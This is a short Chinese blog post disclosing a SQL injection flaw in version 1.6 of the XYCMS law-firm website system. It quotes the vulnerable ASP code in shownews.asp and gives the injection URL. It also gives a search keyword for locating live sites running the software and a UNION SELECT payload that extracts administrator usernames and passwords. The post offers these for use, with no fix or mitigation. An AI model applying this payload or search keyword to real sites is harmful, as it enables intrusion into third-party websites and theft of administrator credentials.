![[转载]分析Discuz防注入函数绕过漏洞](http://www.afeng.org/wp-content/themes/afeng_org/res/img/big1.jpg)
XYCMS律师事务所建站系统注入漏洞
作者:Liuker
前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
淫荡分割线
--------------------------------------------------------
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
源码地址:http://down.chinaz.com/soft/29233.htm
漏洞文件:shownews.asp
漏洞代码:7-13行
<%id=request.QueryString("id")set snews=server.createobject("adodb.recordset")exec="select * from [news] where id="&idsnews.open exec,conn,1,1%> |
什么过滤都没有 直造成注入
注入点:http://127.0.0.1:99/shownews.asp?id=xx
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
关键字:律师 powered by xycms
exp: union select 1,admin,password,4,5,7 from admin_user
本文标签:XYCMS漏洞
已有0条评论,欢迎点评!
国际惯例, 沙发拿下 . . .